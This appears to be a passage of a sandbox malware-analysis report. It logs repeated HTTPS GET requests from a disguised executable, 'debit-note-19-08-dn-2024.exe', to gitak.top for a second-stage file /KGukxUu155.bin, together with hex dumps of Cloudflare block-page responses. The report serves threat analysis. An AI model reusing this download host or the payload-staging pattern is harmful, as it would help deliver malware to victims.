                              2024-08-26 13:35:12 UTC1369INData Raw: 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 77 6f 66 67 4d 55 41 34 39 65 33 36 6b 79 75 41 4e 31 72 2e 33 6e 6f 4e 58 7a 52 75 37 57 6f 6f 76 48 6a 48 64 75 4d 70 5a 66 38 2d 31 37 32 34 36 37 39 33 31 32 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65
                              Data Ascii: nput type="hidden" name="atok" value="wofgMUA49e36kyuAN1r.3noNXzRu7WoovHjHduMpZf8-1724679312-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style
                              2024-08-26 13:35:12 UTC848INData Raw: 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 61 3e
                              Data Ascii: :hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a>
                              2024-08-26 13:35:12 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              18192.168.11.2049835172.67.207.2194435076C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              TimestampBytes transferredDirectionData
                              2024-08-26 13:35:23 UTC168OUTGET /KGukxUu155.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: gitak.top
                              Cache-Control: no-cache
                              2024-08-26 13:35:23 UTC539INHTTP/1.1 200 OK
                              Date: Mon, 26 Aug 2024 13:35:23 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              X-Frame-Options: SAMEORIGIN
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1ZcpdRH3XhJ%2FTAleYUX%2FbERQzKH4DnZ9ouA1HJtSmm58yz0aH1BWGtBpwfjhG4WgqxTr0G%2BoT8I9GA5ab7vW5jFcr4V12hSCjJAFm3kNQKV5gdVgJuZOje2oL08%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b94346aefc95a69-IAD
                              2024-08-26 13:35:23 UTC830INData Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                              Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                              2024-08-26 13:35:23 UTC1369INData Raw: 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29 3b 0a
                              Data Ascii: .css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert');
                              2024-08-26 13:35:23 UTC1369INData Raw: 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 6f 58 6b 38 47 49 6c 4b 78 6c 59 63 4e 66 53 30 75 78 63 62 4d 57 6d 75 6a 73 75 67 47 55 75 6c 77 34 6e 77 6d 34 32 30 74 58 34 2d 31 37 32 34 36 37 39 33 32 33 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79
                              Data Ascii: <input type="hidden" name="atok" value="oXk8GIlKxlYcNfS0uxcbMWmujsugGUulw4nwm420tX4-1724679323-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" sty
                              2024-08-26 13:35:23 UTC850INData Raw: 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f
                              Data Ascii: sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</
                              2024-08-26 13:35:23 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              19192.168.11.2049836172.67.207.2194435076C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              TimestampBytes transferredDirectionData
                              2024-08-26 13:35:33 UTC168OUTGET /KGukxUu155.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: gitak.top
                              Cache-Control: no-cache
                              2024-08-26 13:35:33 UTC543INHTTP/1.1 200 OK
                              Date: Mon, 26 Aug 2024 13:35:33 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              X-Frame-Options: SAMEORIGIN
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=blPq4WdX%2B20eEutSCW5w8ETn6elc0kh%2FbHbk7KiVy00YB8h%2F%2FMNmjn77%2BSpAmPZxEZK9RUwpb4ZEbojJR5rZ6YeNbOWG71x1mOm0RX6flbf5pqwveE3s8pPAINM%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b9434acac2ec940-IAD
                              2024-08-26 13:35:33 UTC826INData Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                              Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                              2024-08-26 13:35:33 UTC1369INData Raw: 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74
                              Data Ascii: s.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert
                              2024-08-26 13:35:33 UTC1369INData Raw: 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 67 67 36 4b 67 50 35 5a 46 4c 6f 66 7a 62 6c 6d 5f 37 6e 44 79 72 6d 32 4f 4b 43 33 68 4a 62 51 62 2e 6c 2e 4f 63 43 61 79 6d 51 2d 31 37 32 34 36 37 39 33 33 33 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22
                              Data Ascii: <input type="hidden" name="atok" value="gg6KgP5ZFLofzblm_7nDyrm2OKC3hJbQb.l.OcCaymQ-1724679333-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn"
                              2024-08-26 13:35:33 UTC854INData Raw: 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61
                              Data Ascii: tor sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudfla
                              2024-08-26 13:35:33 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              20192.168.11.2049837172.67.207.2194435076C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              TimestampBytes transferredDirectionData
                              2024-08-26 13:35:44 UTC168OUTGET /KGukxUu155.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: gitak.top
                              Cache-Control: no-cache
                              2024-08-26 13:35:44 UTC551INHTTP/1.1 200 OK
                              Date: Mon, 26 Aug 2024 13:35:44 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              X-Frame-Options: SAMEORIGIN
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MUM%2FxtclieR%2BGKclI%2Fdf0IpXQlPawruoG24bmM52uCF5w02ovbcUapoykp9u%2B456m8%2F3%2FOaw588VblZgXL52LQu7oNbqFUdLKh0VRUfhYv%2BCpyTPXY%2FvZHwc%2Brk%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b9434ee4aa881b1-IAD
                              2024-08-26 13:35:44 UTC818INData Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                              Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                              2024-08-26 13:35:44 UTC1369INData Raw: 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b
                              Data Ascii: cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cook
                              2024-08-26 13:35:44 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 65 6c 36 7a 6d 6b 73 78 41 61 66 46 50 70 73 79 45 54 51 73 2e 7a 4c 6d 74 4f 65 37 50 63 49 4c 31 4f 68 6c 34 34 71 33 74 6c 77 2d 31 37 32 34 36 37 39 33 34 34 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d
                              Data Ascii: <input type="hidden" name="atok" value="el6zmksxAafFPpsyETQs.zLmtOe7PcIL1Ohl44q3tlw-1724679344-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class=
                              2024-08-26 13:35:44 UTC862INData Raw: 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e
                              Data Ascii: r-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">
                              2024-08-26 13:35:44 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              21192.168.11.2049838172.67.207.2194435076C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              TimestampBytes transferredDirectionData
                              2024-08-26 13:35:54 UTC168OUTGET /KGukxUu155.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: gitak.top
                              Cache-Control: no-cache
                              2024-08-26 13:35:54 UTC543INHTTP/1.1 200 OK
                              Date: Mon, 26 Aug 2024 13:35:54 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              X-Frame-Options: SAMEORIGIN
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OjOz9ww92CJuTyxuhNjtiieYVH7p39iJdOYjIj7oZZ6auVu6rzdQHi0E6TU1EWv2i%2F2%2BfBx%2FkiP56vUIAyM6PaEV5PoU74WRBug4SMpKUt1oyhJ7%2BwUeDv%2BjkbY%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b9435301eda0609-IAD
                              2024-08-26 13:35:54 UTC826INData Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                              Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                              2024-08-26 13:35:54 UTC1369INData Raw: 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74
                              Data Ascii: s.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert
